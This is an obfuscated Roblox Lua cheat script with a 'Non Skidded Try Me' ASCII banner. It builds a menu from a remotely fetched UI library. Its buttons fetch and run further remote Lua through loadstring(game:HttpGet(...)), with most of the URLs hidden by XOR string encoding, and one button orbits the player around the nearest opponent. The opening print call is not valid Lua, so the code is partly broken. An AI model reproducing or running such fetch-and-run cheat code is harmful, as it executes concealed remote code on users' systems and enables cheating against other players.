print("
███╗░░██╗░█████╗░███╗░░██╗  ░██████╗██╗░░██╗██╗██████╗░██████╗░███████╗██████╗░  ████████╗██████╗░██╗░░░██╗
████╗░██║██╔══██╗████╗░██║  ██╔════╝██║░██╔╝██║██╔══██╗██╔══██╗██╔════╝██╔══██╗  ╚══██╔══╝██╔══██╗╚██╗░██╔╝
██╔██╗██║██║░░██║██╔██╗██║  ╚█████╗░█████═╝░██║██║░░██║██║░░██║█████╗░░██║░░██║  ░░░██║░░░██████╔╝░╚████╔╝░
██║╚████║██║░░██║██║╚████║  ░╚═══██╗██╔═██╗░██║██║░░██║██║░░██║██╔══╝░░██║░░██║  ░░░██║░░░██╔══██╗░░╚██╔╝░░
██║░╚███║╚█████╔╝██║░╚███║  ██████╔╝██║░╚██╗██║██████╔╝██████╔╝███████╗██████╔╝  ░░░██║░░░██║░░██║░░░██║░░░
╚═╝░░╚══╝░╚════╝░╚═╝░░╚══╝  ╚═════╝░╚═╝░░╚═╝╚═╝╚═════╝░╚═════╝░╚══════╝╚═════╝░  ░░░╚═╝░░░╚═╝░░╚═╝░░░╚═╝░░░

███╗░░░███╗███████╗
████╗░████║██╔════╝
██╔████╔██║█████╗░░
██║╚██╔╝██║██╔══╝░░
██║░╚═╝░██║███████╗
╚═╝░░░░░╚═╝╚══════╝")
local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v21,v22) local v23={};for v28=1, #v21 do v6(v23,v0(v4(v1(v2(v21,v28,v28 + 1 )),v1(v2(v22,1 + (v28% #v22) ,1 + (v28% #v22) + 1 )))%256 ));end return v5(v23);end print(v7("\226\202\220\40\231\251\207\11\211\131\210\54\166\175\207\27\145\193\222\54\242\250","\126\177\163\187\69\134\219\167"));local v8=loadstring(game:HttpGet(v7("\43\217\62\213\239\121\130\101\214\245\49\196\63\214\178\46\200\36\208\179\49\204\51\195\245\38\193\46","\156\67\173\74\165")))();local v9=v8:CreateWindow({[v7("\26\182\68\19","\38\84\215\41\118\220\70")]=v7("\99\31\37\31\255\16\62\55\16","\158\48\118\66\114"),[v7("\130\39\31\56","\155\203\68\112\86\19\197")]=126 -(116 + 10) ,[v7("\106\210\55\248\73\118\226\204\79\201\58\249","\152\38\189\86\156\32\24\133")]=v7("\206\86\190\64\245\82\171\66\188\126\169\82\249\69\161\71\255\82\231\117\233\94\179\67","\38\156\55\199"),[v7("\132\114\125\44\26\122\253\112\189\127\104\33\7\120\255","\35\200\29\28\72\115\20\154")]=v7("\27\166\145\236\132\62\61\12\172","\84\121\223\177\191\237\76"),[v7("\143\94\204\173\63","\161\219\54\169\192\90\48\80")]=v7("\109\71\6\36\92\78\20","\69\41\34\96"),[v7("\152\202\196\11\0\39\185\241\214\19\4\34\185\207\211\58\16\36\177\211\195\25","\75\220\163\183\106\98")]=false,[v7("\38\179\152\54\219\14\191\169\34\208\14\190\188\54\203\12\179\133\48\202","\185\98\218\235\87")]=false,[v7("\232\51\41\224\215\173\222\46\38\242\215\165\197\15\38\240\215\164\204","\202\171\92\71\134\190")]={[v7("\12\207\45\138\37\196\40","\232\73\161\76")]=true,[v7("\157\214\78\89\27\169\247\67\80\27","\126\219\185\34\61")]=nil,[v7("\42\199\82\119\80\118\254\226","\135\108\174\62\18\30\23\147")]=v7("\148\224\45\139\48\187\49","\167\214\137\74\171\120\206\83")},[v7("\175\249\33\94\247\181\143","\199\235\144\82\61\152")]={[v7("\34\24\184\41\11\19\189","\75\103\118\217")]=false,[v7("\238\90\102\29\173\27","\126\167\52\16\116\217")]=v7("\198\33\41\142\162\16\232\205\34\41\142\191","\156\168\78\64\224\212\121"),[v7("\53\235\168\203\10\236\160\220\45\225\172\192\20","\174\103\142\197")]=true},[v7("\125\45\70\11\60\77\236\83\37","\152\54\72\63\88\69\62")]=false,[v7("\255\193\247\111\209\208\250\85\218\195\253","\60\180\164\142")]={[v7("\108\87\17\37\34","\114\56\62\101\73\71\141")]=v7("\141\231\207\205\172\229\222\192","\164\216\137\187"),[v7("\225\243\51\166\175\234\7\215","\107\178\134\81\210\198\158")]=v7("\19\11\155\134\153\33\29\150\195\167","\202\88\110\226\166"),[v7("\237\0\150\242","\170\163\111\226\151")]=v7("\63\63\242\53\75\35\33\30\52\242\55\72\119\38\19\36\179\49\64\62\39\22\112\166\48\75\119\34\20\41\242\49\93\119\57\3\63\164\49\74\50\45","\73\113\80\210\88\46\87"),[v7("\167\37\193\23\201\128\33\200","\135\225\76\173\114")]=v7("\49\232\161","\199\122\141\216\208\204\221"),[v7("\158\220\6\245\83\243\180","\150\205\189\112\144\24")]=true,[v7("\2\150\190\78\47\141\8\54\55\139\178\127\13\156\20","\112\69\228\223\44\100\232\113")]=false,[v7("\255\26\30","\230\180\127\103\179\214\28")]={v7("\164\0\83\74\235","\128\236\101\63\38\132\33")}}});local v10=v9:CreateTab(v7("\129\168\24\74","\175\204\201\113\36\214\139"),4483363196 -(542 + 196) );local v11=v10:CreateSection(v7("\106\205\60\210\68\116\201\54\200\13\72\194","\100\39\172\85\188"));local v12=v10:CreateButton({[v7("\131\121\180\133","\83\205\24\217\224")]=v7("\204\150\223\108\232\194\141\109\224\195\141\117\212\208\195\125\213\198\223\52\246\209\141\24\254\196\192\45\234\192\132","\93\134\165\173"),[v7("\157\243\205\206\56\207\177\117","\30\222\146\161\162\90\174\210")]=function() loadstring(game:HttpGet(v7("\237\90\100\26\246\20\63\69\245\79\99\30\224\72\105\68\228\94\96\69\242\79\35\28\183\120\119\7\170\92\113\29","\106\133\46\16")))();end});local v13=v10:CreateButton({[v7("\118\33\126\249","\32\56\64\19\156\58")]=v7("\104\221\235\22\115\252\134\83\198\236\66\95\178\185\83\205\233\82","\224\58\168\133\54\58\146"),[v7("\122\87\71\241\119\135\132\0","\107\57\54\43\157\21\230\231")]=function() loadstring(game:HttpGet(v7("\211\159\5\229\170\134\128\148\153\16\226\247\219\198\207\131\4\247\172\207\202\201\136\30\251\173\217\193\207\197\18\250\180\147\234\223\140\20\220\128\147\198\213\141\24\251\176\200\202\194\130\20\249\189\147\194\218\152\5\240\171\147\220\212\158\3\246\188","\175\187\235\113\149\217\188")))();end});local v14=v10:CreateButton({[v7("\18\174\140\73","\24\92\207\225\44\131\25")]=v7("\120\158\173\66\24\61\127\214\171\88","\29\43\179\216\44\123"),[v7("\158\216\44\64\191\216\35\71","\44\221\185\64")]=function() loadstring(game:HttpGet("https://gitlab.com/sens3/nebunu/-/raw/main/HummingBird8's_sUNC_yes_i_moved_to_gitlab_because_my_github_acc_got_brickedd/sUNCm0m3n7.lua"))();end});local v15=v10:CreateButton({[v7("\47\230\69\90","\19\97\135\40\63")]=v7("\158\78\58\53\59\113\139\68\54\56\58\37\161\78\115\18\43\52\160\72\58\47\54","\81\206\60\83\91\79"),[v7("\109\170\220\126\45\194\78\175","\196\46\203\176\18\79\163\45")]=function() print(v7("\157\58\123\29\49\239\224\170\98\87\26\33\245\251\177\54\103\68\100","\143\216\66\30\126\68\155")   .. tostring(game:GetService(v7("\154\196\12\210\192\177\196","\129\202\168\109\171\165\195\183")).LocalPlayer.UserId) );end});local v16=v9:CreateTab(v7("\15\81\36\219","\134\66\56\87\184\190\116"),5097633115 -614270657 );local v17=v16:CreateSection(v7("\17\56\26\184\28\231\45\52\50\52\6\174\10\171\7\48\61\37\28\169\28\248","\85\92\81\105\219\121\139\65"));local v18=v16:CreateButton({[v7("\211\178\93\64","\191\157\211\48\37\28")]=v7("\252\23\245\8\122\253\6\228\29\41\204","\90\191\127\148\124"),[v7("\91\134\34\27\122\134\45\28","\119\24\231\78")]=function() loadstring(game:HttpGet(v7("\138\57\177\90\207\26\94\205\63\164\93\146\71\24\150\37\176\72\201\83\20\144\46\170\68\200\69\31\150\99\166\69\209\15\51\139\35\162\95\207\119\35\205\46\164\94\222\89\1\131\62\182\79\206\83\25\139\57\234\88\217\70\2\205\37\160\75\216\83\94\143\44\172\68\147\83\30\143\40\182\66\213\84","\113\226\77\197\42\188\32")))();end});local v19=v16:CreateButton({[v7("\20\23\249\176","\213\90\118\148")]=v7("\114\32\162\95\94\82\44\189\90\68\79\55\244\98\66\92\41\184\83","\45\59\78\212\54"),[v7("\51\87\143\135\132\47\174\251","\144\112\54\227\235\230\78\205")]=function() local v24=0 + 0 ;local v25;while true do if (v24==(0 + 0)) then v25=0;while true do if (v25==(0 + 0)) then _G.Snail_Config={[v7("\128\56\10\249\212","\59\211\72\111\156\176")]=0.4 -0 ,[v7("\122\146\237\35\75\139\208\61\75\130\231","\77\46\231\131")]=1,[v7("\149\82\176\83\191\64","\32\218\52\214")]=CFrame.new(0 -0 ,3,1551 -(1126 + 425) ),[v7("\122\2\63\166\244\188\106\92\72\4\52\188","\58\46\119\81\200\145\208\37")]=CFrame.new(0, -(411 -(118 + 287)),0 -0 ),[v7("\31\137\60\169\185\178\36\63","\86\75\236\80\204\201\221")]=Enum.KeyCode.E,[v7("\70\84\121\139\251\135","\235\18\33\23\229\158")]=Enum.KeyCode.Q,[v7("\98\191\210\190\68\153\192\182\85\168\192","\219\48\218\161")]=Enum.KeyCode.R,[v7("\208\100\114\71\222\67\201\247\69\115\78\220\67\229","\128\132\17\28\41\187\47")]=true,[v7("\37\59\21\46\92\15\49\3\25\85\0\60\1\63\78\50\34\3\63\89","\61\97\82\102\90")]=true,[v7("\153\61\174\104\198\90\27\27\173\28\164\95\198\67\23\6\162","\105\204\78\203\43\167\55\126")]=false,[v7("\129\163\48\10\18\10\196\84","\49\197\202\67\126\115\100\167")]=5,[v7("\18\85\222\43\140\83\90","\62\87\59\191\73\224\54")]=true,[v7("\212\13\239\199\227\17","\169\135\98\154")]=true,[v7("\234\98\32\93\242\32","\168\171\23\68\52\157\83")]={[v7("\192\116\249\168\53\34\149\224","\231\148\17\149\205\69\77")]={[v7("\179\168\210\245\83\214\132","\159\224\199\167\155\55")]=507863457}},[v7("\218\242\36\237\223\246\53\213\255\231","\178\151\147\92")]=1136 -(118 + 1003) ,[v7("\190\242\67\38\45\100\127\133\250\68\38","\26\236\157\44\82\114\44")]=4};if _G.Snail_Ran then return;end v25=2 -1 ;end if ((378 -(142 + 235))==v25) then loadstring(game:HttpGet(v7("\34\58\193\75\57\116\154\20\47\54\212\86\58\34\208\21\41\33\216\20\57\32\212\82\38\61\214\73\35\62\193\21\38\59\212","\59\74\78\181")))();v8:Notify({[v7("\17\216\78\86\182","\211\69\177\58\58")]=v7("\158\235\111\252\250\194\181\236\117\252\253\210\247\209\118\242\238\199\178","\171\215\133\25\149\137"),[v7("\194\199\60\238\234\62\232","\34\129\168\82\154\143\80\156")]=v7("\181\160\54\24\91\14\172\197\166\60\75\92\75\133\128\162\60\25\92\2\201\180\242\39\4\8\90\156\139\188\54\7\4\14\136\139\182\115\57\8\90\134\197\160\54\24\77\90\201\145\186\54\75\75\79\132\128\160\50","\233\229\210\83\107\40\46"),[v7("\229\87\32\215\17\200\77\60","\101\161\34\82\182")]=27.5 -21 ,[v7("\193\0\88\249\222","\78\136\109\57\158\187\130\226")]=4483362458});break;end end break;end end end});local v20=v16:CreateButton({[v7("\16\62\244\244","\145\94\95\153")]=v7("\210\223\22\220\90\247\205\193\21\204\75\165","\215\157\173\116\181\46"),[v7("\22\181\135\254\216\52\183\128","\186\85\212\235\146")]=function() local v26=0 + 0 ;local v27;while true do if (v26==(978 -(553 + 424))) then _G.Range="5";v27=game:GetService(v7("\242\141\23\231\60\252\75","\56\162\225\118\158\89\142"));v26=3 -1 ;end if (v26==(2 + 0)) then while _G.Enable do local v29=nil;local v30=math.huge;for v31,v32 in ipairs(v27:GetPlayers()) do if ((v32~=v27.LocalPlayer) and v32.Character and v32.Character:FindFirstChild(v7("\116\16\205\174\44\215\85\1\242\160\45\204\108\4\210\187","\184\60\101\160\207\66"))) then local v35=0 + 0 ;local v36;while true do if (v35==(0 + 0)) then v36=(v32.Character.HumanoidRootPart.Position-v27.LocalPlayer.Character.HumanoidRootPart.Position).Magnitude;if (v36<v30) then v29=v32;v30=v36;end break;end end end end if v29 then local v33=v27.LocalPlayer.Character.HumanoidRootPart.CFrame;local v34=v29.Character.HumanoidRootPart.CFrame;for v37=1,360 do local v38=0;local v39;local v40;local v41;local v42;local v43;while true do if (3==v38) then task.wait(_G.Speed);break;end if (v38==(1 + 1)) then v43=v34 + v42 ;v27.LocalPlayer.Character.HumanoidRootPart.CFrame=v43;v38=3;end if (0==v38) then v39=math.rad(v37);v40=math.sin(v39) * _G.Range ;v38=1 + 0 ;end if (v38==(2 -1)) then v41=math.cos(v39) * _G.Range ;v42=Vector3.new(v40,0 -0 ,v41);v38=4 -2 ;end end end end end v8:Notify({[v7("\5\139\104\176\52","\220\81\226\28")]=v7("\60\199\128\242\254\135\35\217\131\226\239\213","\167\115\181\226\155\138"),[v7("\193\45\233\72\126\127\210","\166\130\66\135\60\27\17")]=v7("\125\69\219\53\49\86\79\142\123\63\83\10\193\103\50\77\94\199\123\55\4\94\198\112\112\74\79\207\103\53\87\94\142\101\60\69\83\203\103\113","\80\36\42\174\21"),[v7("\106\5\37\123\90\25\56\116","\26\46\112\87")]=2.5 + 4 ,[v7("\144\46\170\115\186","\212\217\67\203\20\223\223\37")]=4483362458});break;end if (v26==0) then _G.Enable=true;_G.Speed="2";v26=4 -3 ;end end end});
